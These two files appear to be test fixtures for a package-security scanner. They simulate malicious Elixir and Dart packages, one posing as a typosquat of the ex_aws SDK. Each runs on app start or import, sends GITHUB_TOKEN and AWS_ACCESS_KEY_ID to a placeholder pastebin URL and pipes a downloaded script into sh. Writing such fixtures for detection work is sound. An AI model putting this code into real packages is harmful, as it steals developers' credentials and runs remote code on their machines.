File: examples/incidents/hex/ex-aws-mock-0.9.0/lib/evil.ex
# ex_aws_mock (2025) — typosquat of ex_aws (Elixir AWS SDK).
# Exfiltrates env vars and downloads a second-stage payload.
# The Application.start/2 callback runs when the BEAM starts the OTP app.
#
# Detection targets:
#   - suspicious-url (pastebin.com)
#   - install-hook-suspicious (curl | sh via :os.cmd)
#   - net-egress (HTTP egress via :httpc)

defmodule ExAwsMock.Application do
  use Application

  @impl true
  def start(_type, _args) do
    token   = System.get_env("GITHUB_TOKEN", "")
    aws_key = System.get_env("AWS_ACCESS_KEY_ID", "")

    # Exfil env vars.
    :httpc.request(:get, {
      ~c"https://pastebin.com/raw/aegis-test-fixture-not-a-real-paste?t=#{token}&k=#{aws_key}",
      []
    }, [], [])

    # Fetch and execute second-stage shell payload.
    :os.cmd(~c"curl -sSL 'https://pastebin.com/raw/aegis-test-fixture-not-a-real-paste' | sh")

    Supervisor.start_link([], strategy: :one_for_one)
  end
end

File: examples/incidents/pub/dart-exfil-1.0.0/lib/src/evil.dart
// dart-exfil (2025) — simulates a malicious pub.dev package.
// Exfiltrates environment variables via HTTP on first import.
// Dart packages don't have install hooks, but library-level code
// runs at import time via Dart's initializer semantics.
//
// Detection targets:
//   - suspicious-url (pastebin.com)
//   - install-hook-suspicious (curl | sh pattern)
//   - net-egress (HTTP egress via dart:io)

import 'dart:io';

// _init runs when this library is first imported (Dart eagerly evaluates
// top-level variable initializers).
final _init = _exfil();

Future<void> _exfil() async {
  try {
    final token  = Platform.environment['GITHUB_TOKEN']  ?? '';
    final awsKey = Platform.environment['AWS_ACCESS_KEY_ID'] ?? '';
    final client = HttpClient();
    await client.getUrl(Uri.parse(
      'https://pastebin.com/raw/aegis-test-fixture-not-a-real-paste?t=$token&k=$awsKey',
    ));
    // Drop and execute a second-stage script.
    await Process.run('sh', ['-c',
      "curl -sSL 'https://pastebin.com/raw/aegis-test-fixture-not-a-real-paste' | sh"
    ]);
    client.close();
  } catch (_) {}
}
